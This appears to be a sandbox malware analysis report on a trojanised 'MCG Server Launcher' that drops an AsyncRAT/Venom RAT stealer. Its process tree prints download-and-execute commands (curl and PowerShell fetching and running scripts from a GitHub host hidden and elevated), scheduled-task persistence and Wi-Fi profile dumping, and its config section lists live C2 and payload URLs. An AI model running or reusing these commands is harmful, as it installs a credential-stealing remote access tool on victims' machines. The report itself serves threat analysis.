Analysis
-
max time kernel
447s -
max time network
593s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
02/06/2024, 04:18
Static task
static1
Behavioral task
behavioral1
Sample
MCG Server Launcher/MCG Server Launcher.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
MCG Server Launcher/MCG Server Launcher.exe
Resource
win7-20240221-en
Behavioral task
behavioral3
Sample
MCG Server Launcher/MCG Server Launcher.exe
Resource
win10-20240404-en
Behavioral task
behavioral4
Sample
MCG Server Launcher/MCG Server Launcher.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral5
Sample
MCG Server Launcher/MCG Server Launcher.exe
Resource
win11-20240508-en
General
-
Target
MCG Server Launcher/MCG Server Launcher.exe
-
Size
2.1MB
-
MD5
3584a02b77f639b7d7fabe08797bb6eb
-
SHA1
906e6a9044eae39ab17e60e28c4de5a9807c65b3
-
SHA256
1c5c9ce6f9339eb57d39c35b166b5f64e8ea7f427d988aaa3a7d95ce81225e72
-
SHA512
72942199d4ee6146055919de00a224ae90a08e0c5c58f9155a9beca7f986169bbcb8e09e59cae16e83e29e59521cbad77ccf958550abd92a4fbeb0db6e9a43a0
-
SSDEEP
49152:j8mi6FoJtr7uht5r+LXKX6wZYKWHPo6lW9ssdrdjeN:j8mi6F4RujsLXmxMvnA91xeN
Malware Config
Extracted
https://github.com/kevinsocute2/exetemp/releases/download/powershell/System.exe
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.5
Default
wdgbejlkhzx
-
c2_url_file
https://raw.githubusercontent.com/kevinsocute2/exetemp/main/ip.txt
-
delay
1
-
install
true
-
install_file
Registry.exe
-
install_folder
%AppData%
Signatures
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral4/memory/1212-1008-0x000000001C370000-0x000000001C492000-memory.dmp family_stormkitty -
Async RAT payload 1 IoCs
resource yara_rule behavioral4/files/0x0007000000023609-790.dat family_asyncrat -
Blocklisted process makes network request 3 IoCs
flow pid Process 36 2156 powershell.exe 45 5004 powershell.exe 47 5004 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 3256 powershell.exe 4624 powershell.exe 2156 powershell.exe 5004 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation MCG Server Launcher.exe Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation CitizenFX.exe.new Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation System.exe -
Executes dropped EXE 7 IoCs
pid Process 3248 FiveM.exe 2068 CitizenFX.exe.new 5072 FiveM.exe 1908 FiveM.exe 2376 System.exe 3544 FiveM_b2699_DumpServer 1212 Registry.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Registry.exe Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Registry.exe Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Registry.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\Videos\Captures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Local\FiveM\FiveM.app\desktop.ini FiveM.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 36 raw.githubusercontent.com 60 raw.githubusercontent.com 93 discord.com 94 discord.com 9 raw.githubusercontent.com 10 raw.githubusercontent.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 83 icanhazip.com 86 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Registry.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Registry.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 364 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2356 timeout.exe -
Modifies Control Panel 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\Colors FiveM.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\Colors FiveM.exe -
Modifies registry class 23 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 FiveM.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 FiveM.exe Set value (int) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" FiveM.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ FiveM.exe Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 FiveM.exe Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" FiveM.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell FiveM.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags FiveM.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings FiveM.exe Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots FiveM.exe Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff FiveM.exe Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff FiveM.exe Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 FiveM.exe Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff FiveM.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 FiveM.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3571316656-3665257725-2415531812-1000\{B3F244F0-FB4E-4F07-BF77-BD17ABAD83B6} svchost.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell FiveM.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU FiveM.exe Set value (data) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff FiveM.exe Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 FiveM.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ FiveM.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3571316656-3665257725-2415531812-1000\{AC0CC6A7-8B50-4991-BA59-A1B178737F04} svchost.exe -
Suspicious behavior: EnumeratesProcesses 63 IoCs
pid Process 4624 powershell.exe 4624 powershell.exe 2156 powershell.exe 2156 powershell.exe 2156 powershell.exe 3256 powershell.exe 3256 powershell.exe 3256 powershell.exe 5004 powershell.exe 5004 powershell.exe 5004 powershell.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 2376 System.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe 1212 Registry.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4624 powershell.exe Token: SeDebugPrivilege 2156 powershell.exe Token: SeDebugPrivilege 3256 powershell.exe Token: SeDebugPrivilege 5004 powershell.exe Token: SeDebugPrivilege 2376 System.exe Token: SeDebugPrivilege 1212 Registry.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3248 FiveM.exe 1908 FiveM.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 3248 FiveM.exe 1404 OpenWith.exe 1908 FiveM.exe 3604 OpenWith.exe 1908 FiveM.exe 1908 FiveM.exe 3344 OpenWith.exe 1212 Registry.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2884 wrote to memory of 3292 2884 MCG Server Launcher.exe 82 PID 2884 wrote to memory of 3292 2884 MCG Server Launcher.exe 82 PID 2884 wrote to memory of 3292 2884 MCG Server Launcher.exe 82 PID 2884 wrote to memory of 3248 2884 MCG Server Launcher.exe 84 PID 2884 wrote to memory of 3248 2884 MCG Server Launcher.exe 84 PID 3292 wrote to memory of 3116 3292 cmd.exe 85 PID 3292 wrote to memory of 3116 3292 cmd.exe 85 PID 3292 wrote to memory of 3116 3292 cmd.exe 85 PID 3292 wrote to memory of 4624 3292 cmd.exe 90 PID 3292 wrote to memory of 4624 3292 cmd.exe 90 PID 3292 wrote to memory of 4624 3292 cmd.exe 90 PID 3248 wrote to memory of 2068 3248 FiveM.exe 92 PID 3248 wrote to memory of 2068 3248 FiveM.exe 92 PID 2068 wrote to memory of 5072 2068 CitizenFX.exe.new 93 PID 2068 wrote to memory of 5072 2068 CitizenFX.exe.new 93 PID 5072 wrote to memory of 1908 5072 FiveM.exe 94 PID 5072 wrote to memory of 1908 5072 FiveM.exe 94 PID 4624 wrote to memory of 3852 4624 powershell.exe 99 PID 4624 wrote to memory of 3852 4624 powershell.exe 99 PID 4624 wrote to memory of 3852 4624 powershell.exe 99 PID 3852 wrote to memory of 2764 3852 cmd.exe 102 PID 3852 wrote to memory of 2764 3852 cmd.exe 102 PID 3852 wrote to memory of 2764 3852 cmd.exe 102 PID 3852 wrote to memory of 2784 3852 cmd.exe 103 PID 3852 wrote to memory of 2784 3852 cmd.exe 103 PID 3852 wrote to memory of 2784 3852 cmd.exe 103 PID 3852 wrote to memory of 1932 3852 cmd.exe 104 PID 3852 wrote to memory of 1932 3852 cmd.exe 104 PID 3852 wrote to memory of 1932 3852 cmd.exe 104 PID 3852 wrote to memory of 3444 3852 cmd.exe 105 PID 3852 wrote to memory of 3444 3852 cmd.exe 105 PID 3852 wrote to memory of 3444 3852 cmd.exe 105 PID 3852 wrote to memory of 2532 3852 cmd.exe 106 PID 3852 wrote to memory of 2532 3852 cmd.exe 106 PID 3852 wrote to memory of 2532 3852 cmd.exe 106 PID 3852 wrote to memory of 4592 3852 cmd.exe 107 PID 3852 wrote to memory of 4592 3852 cmd.exe 107 PID 3852 wrote to memory of 4592 3852 cmd.exe 107 PID 3852 wrote to memory of 4796 3852 cmd.exe 109 PID 3852 wrote to memory of 4796 3852 cmd.exe 109 PID 3852 wrote to memory of 4796 3852 cmd.exe 109 PID 3852 wrote to memory of 4152 3852 cmd.exe 110 PID 3852 wrote to memory of 4152 3852 cmd.exe 110 PID 3852 wrote to memory of 4152 3852 cmd.exe 110 PID 3852 wrote to memory of 4068 3852 cmd.exe 112 PID 3852 wrote to memory of 4068 3852 cmd.exe 112 PID 3852 wrote to memory of 4068 3852 cmd.exe 112 PID 3852 wrote to memory of 2156 3852 cmd.exe 113 PID 3852 wrote to memory of 2156 3852 cmd.exe 113 PID 3852 wrote to memory of 2156 3852 cmd.exe 113 PID 3852 wrote to memory of 3256 3852 cmd.exe 115 PID 3852 wrote to memory of 3256 3852 cmd.exe 115 PID 3852 wrote to memory of 3256 3852 cmd.exe 115 PID 3256 wrote to memory of 5004 3256 powershell.exe 116 PID 3256 wrote to memory of 5004 3256 powershell.exe 116 PID 3256 wrote to memory of 5004 3256 powershell.exe 116 PID 5004 wrote to memory of 2376 5004 powershell.exe 121 PID 5004 wrote to memory of 2376 5004 powershell.exe 121 PID 2376 wrote to memory of 3980 2376 System.exe 122 PID 2376 wrote to memory of 3980 2376 System.exe 122 PID 2376 wrote to memory of 3384 2376 System.exe 123 PID 2376 wrote to memory of 3384 2376 System.exe 123 PID 3384 wrote to memory of 2356 3384 cmd.exe 126 PID 3384 wrote to memory of 2356 3384 cmd.exe 126 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Registry.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Registry.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\MCG Server Launcher\MCG Server Launcher.exe"C:\Users\Admin\AppData\Local\Temp\MCG Server Launcher\MCG Server Launcher.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Windows\SysWOW64\curl.execurl -L -o "C:\Users\Admin\AppData\Local\Temp\temp.bat" "https://raw.githubusercontent.com/kevinsocute2/exetemp/main/temp.bat"3⤵PID:3116
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\temp.bat' -Verb RunAs -WindowStyle Hidden"3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\temp.bat"4⤵
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\SysWOW64\chcp.comchcp.com 4375⤵PID:2764
-
-
C:\Windows\SysWOW64\find.exefInd5⤵PID:2784
-
-
C:\Windows\SysWOW64\find.exefind5⤵PID:1932
-
-
C:\Windows\SysWOW64\findstr.exefindstr /L /I set C:\Users\Admin\AppData\Local\Temp\temp.bat5⤵PID:3444
-
-
C:\Windows\SysWOW64\findstr.exefindstr /L /I goto C:\Users\Admin\AppData\Local\Temp\temp.bat5⤵PID:2532
-
-
C:\Windows\SysWOW64\findstr.exefindstr /L /I echo C:\Users\Admin\AppData\Local\Temp\temp.bat5⤵PID:4592
-
-
C:\Windows\SysWOW64\findstr.exefindstr /L /I pause C:\Users\Admin\AppData\Local\Temp\temp.bat5⤵PID:4796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c type tmp5⤵PID:4152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c type tmp5⤵PID:4068
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-WebRequest -Uri \"https://raw.githubusercontent.com/kevinsocute2/exetemp/main/script.ps1\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\script.ps1\"}"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -Command "& {Start-Process powershell.exe -ArgumentList '-ExecutionPolicy Bypass -File \"C:\Users\Admin\AppData\Local\Temp\script.ps1\"' -Verb RunAs -WindowStyle Hidden}"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\script.ps1"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Users\Admin\AppData\Roaming\Microsoft\HiddenStartup\MyScriptTemp2\System.exe"C:\Users\Admin\AppData\Roaming\Microsoft\HiddenStartup\MyScriptTemp2\System.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Registry" /tr '"C:\Users\Admin\AppData\Roaming\Registry.exe"' & exit8⤵PID:3980
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Registry" /tr '"C:\Users\Admin\AppData\Roaming\Registry.exe"'9⤵
- Creates scheduled task(s)
PID:364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBFC6.tmp.bat""8⤵
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\Windows\system32\timeout.exetimeout 39⤵
- Delays execution with timeout.exe
PID:2356
-
-
C:\Users\Admin\AppData\Roaming\Registry.exe"C:\Users\Admin\AppData\Roaming\Registry.exe"9⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:1212 -
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All10⤵PID:4932
-
C:\Windows\system32\chcp.comchcp 6500111⤵PID:5024
-
-
C:\Windows\system32\netsh.exenetsh wlan show profile11⤵PID:2140
-
-
C:\Windows\system32\findstr.exefindstr All11⤵PID:676
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid10⤵PID:4624
-
C:\Windows\system32\chcp.comchcp 6500111⤵PID:2676
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid11⤵PID:2160
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\FiveM.exe"C:\Users\Admin\AppData\Local\Temp\FiveM.exe"2⤵
- Executes dropped EXE
- Modifies Control Panel
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Users\Admin\AppData\Local\Temp\CitizenFX.exe.newCitizenFX.exe.new -bootstrap "C:\Users\Admin\AppData\Local\Temp\FiveM.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Users\Admin\AppData\Local\Temp\FiveM.exe"C:\Users\Admin\AppData\Local\Temp\FiveM.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Users\Admin\AppData\Local\FiveM\FiveM.exe"C:\Users\Admin\AppData\Local\FiveM\FiveM.exe"5⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Modifies Control Panel
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1908 -
C:\Users\Admin\AppData\Local\FiveM\FiveM.app\data\cache\subprocess\FiveM_b2699_DumpServer"C:\Users\Admin\AppData\Local\FiveM\FiveM.app\data\cache\subprocess\FiveM_b2699_DumpServer" -dumpserver:2132 -parentpid:19086⤵
- Executes dropped EXE
PID:3544
-
-
-
-
-
-
C:\Windows\System32\GameBarPresenceWriter.exe"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer1⤵PID:3644
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:1404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService1⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
PID:2800
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:3604
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService1⤵
- Checks processor information in registry
- Modifies registry class
PID:4228
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:3344
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\63d6df59fe784065661dd626b8042026\Admin@YCLEXTAL_en-US\System\Process.txt
Filesize2KB
MD56c75965809b7034777d85ab729270c0e
SHA11ef57035f6cd6dd4ac740ef570690d7e2db05bd7
SHA25640f4357f45902581079fc8be453b0e907cf898f91366162b26936f50eac67339
SHA512a5e528336901e93139ab19c6774da6de7a3dbe6cdddd65fa682925bf4035cdf2028b49ede369b421ac6b0b8ab007734b98a2ebba13f0e6f9bf7e9315e9d5757b
-
C:\Users\Admin\AppData\Local\63d6df59fe784065661dd626b8042026\Admin@YCLEXTAL_en-US\System\Process.txt
Filesize4KB
MD5797aa5c9d565b8079ddc843ae4400c76
SHA16d249b9f30b8a8a944e3eda8cd29747b10b06eca
SHA2566c4f734262185d6fb35c33361a9e4688d2afe84b61116f32f65900868299f9c2
SHA5120ff9eebbb3b71dc5a76fb2d8fca75966ea5b53034d965cc6713504df4eef53c722ce34ded34d97b7f4c5d85518f6129c1161f10828c35f854f0b21bd73f6e023
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
37KB
MD53656c6636cd9dbceaf83230c3c9a2be9
SHA1989f27c6736a943fd4690091fed26f7c17e3c17f
SHA256f9ae094812ce9fbd56b58dab7739451792aba8f56c5f21eee15ef96682b413a6
SHA51252bbb8f2b2d6183f30b908d9171a2ec8c2128bbce145b7af0095d4c199b1ec431d650ec4ed0b1b6cbc7bcc8d29da3285cdcc61368faa8c4e57b45315ced4e4ad
-
Filesize
39KB
MD5619814b8b98007c1698576b7e4efb3ec
SHA1e60f3ceaf5ca78f74e6867f0b042951bffb91786
SHA25671ad5591441d62d02d2b62155abcf2cab587af49b86e2db5be6729a5b39df5d1
SHA51255ab0bd3c1750d63ad3304e63b7c26251f01c8994f385e5643e2bbd37fc6595fd0e9f5fc0d76aa655fe8ad3bc6fdee33248d9f4a76cce11a25d84c3f5de16236
-
Filesize
6B
MD5bc0d2ef702db446712420b39a4e92250
SHA1fbf03c92c01bd42022829b761b2bc1f6f6ccc810
SHA2560c7271249d4e34ef9ca98d5c3b622096a7f08568cc88336ac6c0a2d89953e35c
SHA5125c03d84075574f4eeeac5eceff55f590d9ffb289e20ab8a904ec79a221fa105b0f07979c4bf295a7f4e4e1ad81a4c6e6ec4f851f0c80e0c678d710e37b5840d8
-
Filesize
1.8MB
MD5559cc98140d4eff894bdf2b3f6ce2a73
SHA11665ac2284d16bcc1fdd319b023b1d12f1cad343
SHA256dba50975b85ca95d0c41d10ff885c48576aa938731dd56c06af03f46d046e267
SHA512d96ee466b2b7bd7e44a72fac7ddc624b8882252ae9fd1a07c0dad084113a93061551d0bad6b0898a1638d2688ee599dd84b050c14473807986b3e697511a6d66
-
Filesize
2.1MB
MD5c3d94830b2a220533e08ffcc9d44974f
SHA1388ff56c07acfc78d22608406fdfc9d0467cd228
SHA25630f48ffe2637e8f4fcebb8dbf30f6207923755336d8f5568ba578300b03a3418
SHA51262464defcd58e956a7c2a98380a7b9397d19f93f9f3cc61d5fda0cf564becf41f6c5f89eaba9d516840f9f8a043a98e09226ee5193bd1e7ab0e5c3d6bf8ddc12
-
Filesize
1.9MB
MD5681d1b756761d9c7409b072884a8edce
SHA108a14e48347f3bef0bd95aa66099b62b67fa07f4
SHA25651f19f2031f8213ae5a2502b19bb8e60ce42d37da066704c41c1bc9d6f85d387
SHA5129568f50550b8352cfff31ca36fd585b704145beda629421d337b803d0df35b8658ba2a4b9e3908c66d363a3414d989ec321da6f1e21ff1d48e92cabd393fab63
-
Filesize
157B
MD5f9d948aa9426cb1a2a82e651b81a1912
SHA12d496caeef3b0bff6b91b99e58736cea51366348
SHA256b1fe21f251cf7875783ea162ef86c2a5b5022a1c5157bbb7972b6b34e14ec08a
SHA512a962fae3853f43e4a8e2b33aa5f51a917673d76648845dffcc32037c25cb3f300e4c4fc3ea633bf78b714449dbda84416e41cc16256373c170fb82d8485e3369
-
Filesize
1KB
MD5def65711d78669d7f8e69313be4acf2e
SHA16522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA51205b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7
-
Filesize
15KB
MD5ce9ce10aa35ba038c09a1360f964df33
SHA194e3bf0c26f1366a8835c0c96ac8fc51ab09651d
SHA256208ad50bf324d4a3c2786c5b52c5c8308f65c9cd3d4a0348dacfc1219225cc9c
